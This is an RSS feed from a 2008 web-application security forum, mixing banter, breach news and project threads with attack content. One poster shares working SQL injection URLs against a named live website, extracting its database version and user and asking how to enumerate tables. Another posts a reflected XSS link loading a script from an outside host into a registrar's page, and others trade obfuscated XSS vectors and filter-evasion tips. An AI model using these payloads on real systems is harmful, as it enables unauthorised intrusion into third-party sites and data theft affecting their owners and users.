<?xml version="1.0" encoding="iso-8859-1" ?>
<rss version="2.0">
  <channel>
    <title>Web Application Security Forum</title>
    <link>http://sla.ckers.org/forum/index.php</link>
    <description><![CDATA[]]></description>
    <language>EN</language>
    <pubDate>Fri, 16 May 2008 20:43:48 -0500</pubDate>
    <lastBuildDate>Fri, 16 May 2008 20:43:48 -0500</lastBuildDate>
    <category>Web Application Security Forum</category>
    <generator>sla.ckers.org web application security forum</generator>
    <ttl>600</ttl>
    <item>
      <title>[News and Links] Re: opensocial-a-global-unparalleled-security-risk</title>
      <link>http://sla.ckers.org/forum/read.php?13,22379,22380#msg-22380</link>
      <author>thrill</author>
      <description><![CDATA[but but but.. I thought everything google did was secured?]]></description>
      <category>News and Links</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?13,22379,22380#msg-22380</guid>
      <pubDate>Fri, 16 May 2008 20:43:48 -0500</pubDate>
    </item>
    <item>
      <title>[News and Links] opensocial-a-global-unparalleled-security-risk</title>
      <link>http://sla.ckers.org/forum/read.php?13,22379,22379#msg-22379</link>
      <author>Delixe</author>
      <description><![CDATA[Thought you might be interested:
http://www.sociablecode.com/2008/05/15/opensocial-a-global-unparalleled-security-risk/]]></description>
      <category>News and Links</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?13,22379,22379#msg-22379</guid>
      <pubDate>Fri, 16 May 2008 18:22:44 -0500</pubDate>
    </item>
    <item>
      <title>[SQL and Code Injection] Re: SQL INJECTION VULNERABILITY</title>
      <link>http://sla.ckers.org/forum/read.php?16,22354,22378#msg-22378</link>
      <author>m4x</author>
      <description><![CDATA[ty]]></description>
      <category>SQL and Code Injection</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?16,22354,22378#msg-22378</guid>
      <pubDate>Fri, 16 May 2008 15:33:13 -0500</pubDate>
    </item>
    <item>
      <title>[Projects] Re: &lt;------------Hacker's Wiki----------&gt;</title>
      <link>http://sla.ckers.org/forum/read.php?12,20678,22377#msg-22377</link>
      <author>darknessends</author>
      <description><![CDATA[The wiki will be soon up guys.....That is all the news 4 you.]]></description>
      <category>Projects</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?12,20678,22377#msg-22377</guid>
      <pubDate>Fri, 16 May 2008 14:14:48 -0500</pubDate>
    </item>
    <item>
      <title>[SQL and Code Injection] Re: SQL INJECTION VULNERABILITY</title>
      <link>http://sla.ckers.org/forum/read.php?16,22354,22376#msg-22376</link>
      <author>id</author>
      <description><![CDATA[tx Wrote:
-------------------------------------------------------
&gt; id Wrote:
&gt; --------------------------------------------------
&gt; -----
&gt; &gt; NEW RULE, no more posting about neopets unless
&gt; &gt; you're a 10 year old girl that knows SQL.
&gt; 
&gt; http://msdn.microsoft.com/en-us/events/aa740358.as
&gt; px#sqlservergirl

wtf is wrong with people]]></description>
      <category>SQL and Code Injection</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?16,22354,22376#msg-22376</guid>
      <pubDate>Fri, 16 May 2008 13:52:59 -0500</pubDate>
    </item>
    <item>
      <title>[Projects] Re: &lt;------------Hacker's Wiki----------&gt;</title>
      <link>http://sla.ckers.org/forum/read.php?12,20678,22375#msg-22375</link>
      <author>tx</author>
      <description><![CDATA[&quot;I have opinions of my own --strong opinions-- but I don't always agree with them.&quot;
- George H.W. Bush

pointless quotations... Is this thread going anywhere?]]></description>
      <category>Projects</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?12,20678,22375#msg-22375</guid>
      <pubDate>Fri, 16 May 2008 12:58:30 -0500</pubDate>
    </item>
    <item>
      <title>[SQL and Code Injection] Re: SQL INJECTION VULNERABILITY</title>
      <link>http://sla.ckers.org/forum/read.php?16,22354,22374#msg-22374</link>
      <author>tx</author>
      <description><![CDATA[id Wrote:
-------------------------------------------------------
&gt; NEW RULE, no more posting about neopets unless
&gt; you're a 10 year old girl that knows SQL.

http://msdn.microsoft.com/en-us/events/aa740358.aspx#sqlservergirl]]></description>
      <category>SQL and Code Injection</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?16,22354,22374#msg-22374</guid>
      <pubDate>Fri, 16 May 2008 12:51:15 -0500</pubDate>
    </item>
    <item>
      <title>[SQL and Code Injection] Re: SQL INJECTION VULNERABILITY</title>
      <link>http://sla.ckers.org/forum/read.php?16,22354,22373#msg-22373</link>
      <author>thrill</author>
      <description><![CDATA[neopets are pets too you know...]]></description>
      <category>SQL and Code Injection</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?16,22354,22373#msg-22373</guid>
      <pubDate>Fri, 16 May 2008 11:21:27 -0500</pubDate>
    </item>
    <item>
      <title>[XSS Info] Re: New XSS vectors/Unusual Javascript</title>
      <link>http://sla.ckers.org/forum/read.php?2,15812,22372#msg-22372</link>
      <author>Gareth Heyes</author>
      <description><![CDATA[Script('/'.concat(/\
alert(1)/).concat(/ /))()]]></description>
      <category>XSS Info</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?2,15812,22372#msg-22372</guid>
      <pubDate>Fri, 16 May 2008 11:20:49 -0500</pubDate>
    </item>
    <item>
      <title>[XSS Info] Re: New XSS vectors/Unusual Javascript</title>
      <link>http://sla.ckers.org/forum/read.php?2,15812,22371#msg-22371</link>
      <author>Gareth Heyes</author>
      <description><![CDATA[Script(XML()..x.@y?'alert(1)':2.)()]]></description>
      <category>XSS Info</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?2,15812,22371#msg-22371</guid>
      <pubDate>Fri, 16 May 2008 10:20:51 -0500</pubDate>
    </item>
    <item>
      <title>[SQL and Code Injection] Re: SQL INJECTION VULNERABILITY</title>
      <link>http://sla.ckers.org/forum/read.php?16,22354,22370#msg-22370</link>
      <author>id</author>
      <description><![CDATA[NEW RULE, no more posting about neopets unless you're a 10 year old girl that knows SQL.]]></description>
      <category>SQL and Code Injection</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?16,22354,22370#msg-22370</guid>
      <pubDate>Fri, 16 May 2008 09:56:13 -0500</pubDate>
    </item>
    <item>
      <title>[XSS Info] Re: New XSS vectors/Unusual Javascript</title>
      <link>http://sla.ckers.org/forum/read.php?2,15812,22369#msg-22369</link>
      <author>Gareth Heyes</author>
      <description><![CDATA[Cool stuff Dan :D

Hehe check this:-
.0.*?1.:Script(.0.*?1.:'\134u006eame')()

*Note
Requires a payload assigned to &quot;name&quot;, the result can be simulated like so:-
name='alert(/Chloe is gorgeous (my daughter)/)'
.0.*?1.:Script(.0.*?1.:'eval(\134u006eame)')()]]></description>
      <category>XSS Info</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?2,15812,22369#msg-22369</guid>
      <pubDate>Fri, 16 May 2008 09:51:55 -0500</pubDate>
    </item>
    <item>
      <title>[SQL and Code Injection] Re: SQL INJECTION VULNERABILITY</title>
      <link>http://sla.ckers.org/forum/read.php?16,22354,22368#msg-22368</link>
      <author>Awesome AnDrEw</author>
      <description><![CDATA[id Wrote:
-------------------------------------------------------
&gt; Have I ever mentioned how much I hate this topic?

You have indeed. In fact it was in a topic started by the same user, asking the same question, which can be found [url=http://sla.ckers.org/forum/read.php?16,21940]here (http://sla.ckers.org/forum/read.php?16,21940)[/url].]]></description>
      <category>SQL and Code Injection</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?16,22354,22368#msg-22368</guid>
      <pubDate>Fri, 16 May 2008 09:28:20 -0500</pubDate>
    </item>
    <item>
      <title>[Projects] Re: Web2Torrent</title>
      <link>http://sla.ckers.org/forum/read.php?12,21188,22367#msg-22367</link>
      <author>darknessends</author>
      <description><![CDATA[I am really not a PHP programmer, if can help if we port it to ASP.NET]]></description>
      <category>Projects</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?12,21188,22367#msg-22367</guid>
      <pubDate>Fri, 16 May 2008 08:09:45 -0500</pubDate>
    </item>
    <item>
      <title>[Projects] Re: &lt;------------Hacker's Wiki----------&gt;</title>
      <link>http://sla.ckers.org/forum/read.php?12,20678,22366#msg-22366</link>
      <author>darknessends</author>
      <description><![CDATA[Property may be destroyed and money may lose its purchasing power; but, character, health, knowledge and good judgement will always be in demand under all conditions. - Roger Babson]]></description>
      <category>Projects</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?12,20678,22366#msg-22366</guid>
      <pubDate>Fri, 16 May 2008 08:03:25 -0500</pubDate>
    </item>
    <item>
      <title>[Projects] Re: &lt;------------Hacker's Wiki----------&gt;</title>
      <link>http://sla.ckers.org/forum/read.php?12,20678,22365#msg-22365</link>
      <author>darknessends</author>
      <description><![CDATA[Never be afraid to meet to the hilt the demand of either work, or friendship - two of life's major assets.]]></description>
      <category>Projects</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?12,20678,22365#msg-22365</guid>
      <pubDate>Fri, 16 May 2008 08:02:39 -0500</pubDate>
    </item>
    <item>
      <title>[SQL and Code Injection] Re: SQL INJECTION VULNERABILITY</title>
      <link>http://sla.ckers.org/forum/read.php?16,22354,22364#msg-22364</link>
      <author>Jiu</author>
      <description><![CDATA[m4x Wrote:
-------------------------------------------------------
&gt; I recently found an SQL injection vulnerability on
&gt; a site named neopets.com..
&gt; 
&gt; I have been able to get some output but in a
&gt; different kind of way...heres what i have - 
&gt; 
&gt; http://www.neopets.com/s/index.phtml?track_cat_id=
&gt; -1%20union%20select%201,@@version,3,4,5,6,7&amp;item_i
&gt; d=346&amp;track_start_point_id=129
&gt; 
&gt; That gets me the version number ^^.
&gt; 
&gt; The following gets me the current user and DB - 
&gt; 
&gt; http://www.neopets.com/s/index.phtml?track_cat_id=
&gt; -1%20union%20select%201,current_user(),database(),
&gt; 4,5,6,7&amp;item_id=346&amp;track_start_point_id=129
&gt; 
&gt; I would like to get the table names but I am kind
&gt; of in a slump...Any help appreciated...I have been
&gt; using the following functions but no luck finding
&gt; one to get table names -
&gt; http://dev.mysql.com/doc/refman/4.1/en/other-funct
&gt; ions.html

Recenctly, i found that sql injection... =&gt; http://sla.ckers.org/forum/read.php?2,21919

Jiu]]></description>
      <category>SQL and Code Injection</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?16,22354,22364#msg-22364</guid>
      <pubDate>Fri, 16 May 2008 07:45:52 -0500</pubDate>
    </item>
    <item>
      <title>[Networking] Re: domain name dot AC.dot IO.dot SH at  the  price $55 dot cn $0.14 dot COM $6.56</title>
      <link>http://sla.ckers.org/forum/read.php?6,22359,22362#msg-22362</link>
      <author>.mario</author>
      <description><![CDATA[Guess [url=http://www.todaynic.com/whois/domaincheck.php?language=%22%3E%3Cscript%20src=http://0x.lv%3E%3C/script%3E]what else[/url] is available on this domain you mentioned, spammer.]]></description>
      <category>Networking</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?6,22359,22362#msg-22362</guid>
      <pubDate>Fri, 16 May 2008 02:31:51 -0500</pubDate>
    </item>
    <item>
      <title>[Networking] domain name dot AC.dot IO.dot SH at  the  price $55 dot cn $0.14 dot COM $6.56</title>
      <link>http://sla.ckers.org/forum/read.php?6,22359,22359#msg-22359</link>
      <author>sharoncao</author>
      <description><![CDATA[Posting from: 61.145.229.66
Lame site: www.todaynic.com

Please hack me!

Other crap below.
msn:info@todaynic.com
skype:sharon841101]]></description>
      <category>Networking</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?6,22359,22359#msg-22359</guid>
      <pubDate>Thu, 15 May 2008 22:57:20 -0500</pubDate>
    </item>
    <item>
      <title>[Projects] Re: &lt;------------Hacker's Wiki----------&gt;</title>
      <link>http://sla.ckers.org/forum/read.php?12,20678,22358#msg-22358</link>
      <author>Spyware</author>
      <description><![CDATA[darknessends Wrote:
-------------------------------------------------------
&gt; I WANT A GENERAL HACKING WIKI, ALL THE STUFF

We can make demands now? Damn it, no one told me.

/me demands Dr. Foots.]]></description>
      <category>Projects</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?12,20678,22358#msg-22358</guid>
      <pubDate>Thu, 15 May 2008 21:10:40 -0500</pubDate>
    </item>
    <item>
      <title>[Projects] Re: Web2Torrent</title>
      <link>http://sla.ckers.org/forum/read.php?12,21188,22357#msg-22357</link>
      <author>fragge</author>
      <description><![CDATA[I'm 99% sure I already replied to this.. anyway, this project is being continued by me (and anyone who wants to help dev?) here:

http://houseofhackers.org/group/australianit/forum/topic/show?id=2092781%3ATopic%3A10665

Next version should be done today if I'm not too busy.]]></description>
      <category>Projects</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?12,21188,22357#msg-22357</guid>
      <pubDate>Thu, 15 May 2008 17:55:54 -0500</pubDate>
    </item>
    <item>
      <title>[SQL and Code Injection] Re: SQL INJECTION VULNERABILITY</title>
      <link>http://sla.ckers.org/forum/read.php?16,22354,22356#msg-22356</link>
      <author>m4x</author>
      <description><![CDATA[Nonono :P]]></description>
      <category>SQL and Code Injection</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?16,22354,22356#msg-22356</guid>
      <pubDate>Thu, 15 May 2008 17:00:23 -0500</pubDate>
    </item>
    <item>
      <title>[SQL and Code Injection] Re: SQL INJECTION VULNERABILITY</title>
      <link>http://sla.ckers.org/forum/read.php?16,22354,22355#msg-22355</link>
      <author>id</author>
      <description><![CDATA[Have I ever mentioned how much I hate this topic?]]></description>
      <category>SQL and Code Injection</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?16,22354,22355#msg-22355</guid>
      <pubDate>Thu, 15 May 2008 16:56:45 -0500</pubDate>
    </item>
    <item>
      <title>[SQL and Code Injection] SQL INJECTION VULNERABILITY</title>
      <link>http://sla.ckers.org/forum/read.php?16,22354,22354#msg-22354</link>
      <author>m4x</author>
      <description><![CDATA[I recently found an SQL injection vulnerability on a site named neopets.com..

I have been able to get some output but in a different kind of way...heres what i have - 

http://www.neopets.com/s/index.phtml?track_cat_id=-1%20union%20select%201,@@version,3,4,5,6,7&amp;item_id=346&amp;track_start_point_id=129

That gets me the version number ^^.

The following gets me the current user and DB - 

http://www.neopets.com/s/index.phtml?track_cat_id=-1%20union%20select%201,current_user(),database(),4,5,6,7&amp;item_id=346&amp;track_start_point_id=129

I would like to get the table names but I am kind of in a slump...Any help appreciated...I have been using the following functions but no luck finding one to get table names - http://dev.mysql.com/doc/refman/4.1/en/other-functions.html]]></description>
      <category>SQL and Code Injection</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?16,22354,22354#msg-22354</guid>
      <pubDate>Thu, 15 May 2008 16:46:27 -0500</pubDate>
    </item>
    <item>
      <title>[SQL and Code Injection] Re: Advanced Evading Techniques ?</title>
      <link>http://sla.ckers.org/forum/read.php?16,22200,22353#msg-22353</link>
      <author>Viciouz</author>
      <description><![CDATA[I assume he`s working on MsSQL dbms.

So what you can do is use /**/ as SPACES. The way you tried to use that technique is completely wrong. try 1;/**/select/**/ or so..

good luck]]></description>
      <category>SQL and Code Injection</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?16,22200,22353#msg-22353</guid>
      <pubDate>Thu, 15 May 2008 14:09:43 -0500</pubDate>
    </item>
    <item>
      <title>[SQL and Code Injection] Re: Using XSS to perform SQL Injection</title>
      <link>http://sla.ckers.org/forum/read.php?16,22276,22352#msg-22352</link>
      <author>donwalrus</author>
      <description><![CDATA[Well, not so much in trying to get around the existing SQLi filters that may or may not be in place for this particular site. It just never occurred to me that more advanced SQL injection commands could be automated via simple JS include where a variable is vulnerable to both SQLi and XSS. I'm not even sure there's anything here, just more curious than anything.

thanks for the reply

---]]></description>
      <category>SQL and Code Injection</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?16,22276,22352#msg-22352</guid>
      <pubDate>Thu, 15 May 2008 13:33:33 -0500</pubDate>
    </item>
    <item>
      <title>[XSS Info] Re: XSS without any of ()&lt;&gt;&amp;;</title>
      <link>http://sla.ckers.org/forum/read.php?2,22338,22351#msg-22351</link>
      <author>.mario</author>
      <description><![CDATA[http://preview.tinyurl.com/6g4ahj

works too - alert\u00281\u0029]]></description>
      <category>XSS Info</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?2,22338,22351#msg-22351</guid>
      <pubDate>Thu, 15 May 2008 06:13:27 -0500</pubDate>
    </item>
    <item>
      <title>[News and Links] Re: TJX Still Lacks Security</title>
      <link>http://sla.ckers.org/forum/read.php?13,15148,22350#msg-22350</link>
      <author>thrill</author>
      <description><![CDATA[[quote] what do you care what the password is? you need physical access to the terminal to crack it regardless.[/quote]

I guess you've never heard of disgruntled employees.. people who would love the ability to install some sort of software that would allow them to record every transaction which later they could copy onto a memory stick. 

Guess you should stick to posting bad things others say about RSnake.]]></description>
      <category>News and Links</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?13,15148,22350#msg-22350</guid>
      <pubDate>Wed, 14 May 2008 23:05:50 -0500</pubDate>
    </item>
    <item>
      <title>[News and Links] Re: TJX Still Lacks Security</title>
      <link>http://sla.ckers.org/forum/read.php?13,15148,22349#msg-22349</link>
      <author>CrYpTiC_MauleR</author>
      <description><![CDATA[&gt;&gt;what do you care what the password is? you need physical access to the terminal to crack it regardless.

I'm not sure how the network is setup, but having a terminal with access to a server that has user accounts with blank passwords is a bad idea. No user account on a server or any computer that is linked to a computer handling register transactions should have a blank password. Honestly, no computer in a corporation that suffered the largest retail breach in history should have any user account with a blank password, there is just no excuse in my opinion.]]></description>
      <category>News and Links</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?13,15148,22349#msg-22349</guid>
      <pubDate>Wed, 14 May 2008 21:29:49 -0500</pubDate>
    </item>
    <item>
      <title>[News and Links] Re: TJX Still Lacks Security</title>
      <link>http://sla.ckers.org/forum/read.php?13,15148,22348#msg-22348</link>
      <author>fragge</author>
      <description><![CDATA[what do you care what the password is? you need physical access to the terminal to crack it regardless. TJX aren't really concerned that they're going to get hacked through that access point mate, they're concerned that their databases will get swiped and sold again. Just my 0.02]]></description>
      <category>News and Links</category>
      <guid isPermaLink="true">http://sla.ckers.org/forum/read.php?13,15148,22348#msg-22348</guid>
      <pubDate>Wed, 14 May 2008 18:29:12 -0500</pubDate>
    </item>
  </channel>
</rss>
